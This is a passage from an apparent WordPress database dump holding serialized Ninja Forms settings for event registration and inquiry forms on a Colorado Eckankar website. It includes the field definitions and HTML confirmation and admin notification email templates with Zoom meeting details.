16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:511;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:512;}i:4;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:513;}i:5;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:3:\"key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";s:13:\"element_class\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:5:\"label\";s:0:\"\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:158:\"<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:0:\"\";s:9:\"field_key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";}s:2:\"id\";i:509;}i:6;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:20:\"submit_1618628929218\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:20:\"submit_1618628929218\";}s:2:\"id\";i:514;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-03-02 07:44:18\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:228:\"<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p>\n<p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email soon with Zoom Login information.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:218;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-03-02 07:44:18\";s:5:\"label\";s:29:\"ECK Registration Confirmation\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:3:\"tag\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:7:\"message\";s:18:\"{all_fields_table}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:2:\"to\";s:13:\"{field:email}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:13:\"email_message\";s:8146:\"<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <br>                              <span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">Satsang Intensive Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding: 30px; padding-top:10px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Hello                                  {field:firstname},<span style=\"color: #333333; font-size: 20px;\"></span><br>                                </span></p>                              <p class=\"\" style=\"font-size: 16px;\"><span style=\"color: #333333; font-size: 20px;\">Thank                                  You For Registering!                                  <br>                                </span></p>                              <p class=\"\" style=\"font-size:20px;\">                                <b>You Are Signed Up                                  For The Following                                  Zoom Event:<br>                                  <span style=\"color: #23507d; font-size: 20px;\">ECK                                    Satsang Intensive - Online<br></span><span style=\"color: #23507d;font-size: 20px;\">10:30 AM to 11:30 AM MDT.</span></b></p>                              <p class=\"\" style=\"font-size: 19px; color: #f28a27;\"><strong>Zoom                                  Login Information:</strong></p>                              <strong>Meeting ID:</strong> 893 0175 4811<br>                              <strong>Passcode: </strong>804641<br>                              <br>                              <strong>Join Zoom Meeting                                from a web browser:</strong><br>                              <a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us06web.zoom.us/j/89301754811?pwd=WmNRREJxSE5UY3lNSWFuY1R4eXFRQT09</a><br>                              <br>                              After you click the link,                              you will be prompted to                              either download the app                              to enter the meeting or                              enter through your                              browser. Please note that                              Zoom works best if you                              download the app. It is                              more stable and has more                              functions. Select use                              computer audio for sound.<br>                              <br>                              Please join the meeting 5                              - 10 minutes ahead of                              time to help us start on                              time. We look forward to                              seeing you at this online                              event.<br>                              <br>                              See you there!</td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">                              <p style=\"margin: 0;\">You                                are receiving this                                email because you have                                submitted a request                                through the <a href=\"https://eckankar-colorado.org/\">Eckankar                                  in Colorado website.</a></p>                              <p style=\"text-align: center; font-family: Arial, Helvetica, sans-serif; font-size: 15px;\">If                                you have any questions                                regarding the origin of                                this email, please feel                                free to get in touch,                                we\'re always happy to                                help out.</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">                              <p style=\"margin: 0 0 8px 0;\"><a style=\"text-decoration: none;\" href=\"https://www.facebook.com/Eckankar-in-Colorado-104663979586166/\"><img style=\"display: inline-block; color: #cccccc;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\"></a>&nbsp;</p>                              <p style=\"margin: 0; font-size: 14px; line-height: 20px;\">©                                Eckankar In Colorado -                                2021<br>                                <a class=\"unsub\" style=\"color: #cccccc; text-decoration: underline;\" href=\"mailto:webmaster@eckankar-colorado.org\">Contact                                  Us</a></p>                            </td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]--></td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>\";}s:2:\"id\";i:216;}i:2;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-03-02 07:44:18\";s:5:\"label\";s:24:\"Admin Email Notification\";s:14:\"drawerDisabled\";b:0;s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:4507:\"<meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1252\">        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table role=\"presentation\" style=\"width:94%;max-width:600px;border:none;border-spacing:0;text-align:left;font-family:Arial,sans-serif;font-size:16px;line-height:22px;color:#363636;\">                <tbody>                  <tr>                    <td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->                      <table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">                        <tbody>                          <tr>                            <td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #ffffff; font-family: Georgia, serif; background-color:#1d5791;\">Eckankar                              In Colorado<br>                              <br>                              <span style=\"padding:40px 30px 30px 30px; text-align: center; font-size: 28px; font-weight: bold; color: #f28a27; font-family: Arial, sans-serif; line-height: 25px;\">New                                Satsang Intensive Registration</span></td>                          </tr>                          <tr>                            <td style=\"padding-left: 30px; padding-right 30px; background-color: #ffffff;\">                              <p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #333333; font-size: 20px;\"><b><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                        </span></span></span></b></span></p>                              <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><b>Admin                                  Notification<br>                                </b></p>                              <b>                                <p class=\"\" style=\"font-family: Open Sans; font-weight: 400; font-size: 18px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A                                  new <b>Satsang Intensive</b> registration                                  has been received. <span style=\"color: #333333; font-size: 20px;\"></span></p>                              </b>                              <p></p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\"><b>Registrant                                Information:</b><br>                              <br>                              <b>Name:</b>&nbsp; <span style=\"display: inline-block;\">{field:firstname}                                {field:lastname}<br>                              </span>                              <p style=\"font-family: Arial, Helvetica, sans-serif; font-size: 18px; text-align: left;\">                                <b>Email:</b>&nbsp;                                {field:email}</p>                            </td>                          </tr>                          <tr>                            <td style=\"padding: 30px; text-align: center; font-size: 16px; background-color: #747474; color: #cccccc;\">Regards,<br>                              Your ECK in Colorado                              Website</td>                          </tr>                        </tbody>                      </table>                      <!-- [if mso]>          </td>          </tr>          </table>          <![endif]-->                    </td>                  </tr>                </tbody>              </table>            </td>          </tr>        </tbody>      </table>    </div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:217;}i:3;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-03-02 07:44:18\";s:5:\"label\";s:16:\"Store Submission\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:14:\"drawerDisabled\";s:0:\"\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";}s:2:\"id\";i:215;}}s:8:\"settings\";a:34:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:30:\"Satsang Intensive Registration\";s:10:\"created_at\";s:19:\"2022-03-02 07:44:18\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:7:{i:0;s:54:\"statewide_satsang_intensive_registration_1646235944769\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";i:6;s:20:\"submit_1618628929218\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(55,'a:7:{s:2:\"id\";i:55;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:11:{i:0;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:23:\"ECK Temple Beautify Day\";s:3:\"key\";s:37:\"eck_temple_beautify_day_1649193811532\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:249:\"<p style:\"font-size:18px;=\"\" color:#26507d;\"=\"\">Thanks for getting in touch with us about \'Beautify Day\' on May 14th at the ECK Temple!</p><p>If you would like more information or have questions about the event, just fill out the form below.<br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:23:\"Event Intro Description\";s:9:\"field_key\";s:23:\"event_intro_description\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:515;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}s:2:\"id\";i:516;}i:2;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:517;}i:3;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:518;}i:4;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:519;}i:5;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Phone\";s:3:\"key\";s:7:\"textbox\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:7:\"textbox\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:520;}i:6;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_1\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_1\";}s:2:\"id\";i:521;}i:7;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:65:\"Let us know if you need more event information or have questions.\";s:4:\"type\";s:8:\"textarea\";s:3:\"key\";s:78:\"let_us_know_if_you_need_more_event_information_or_have_questions_1649193768671\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";i:1;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";b:0;s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";s:3:\"528\";}i:8;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:4:\"hr_2\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:4:\"hr_2\";}s:2:\"id\";i:525;}i:9;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:3:\"key\";s:4:\"html\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:155:\"<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request. 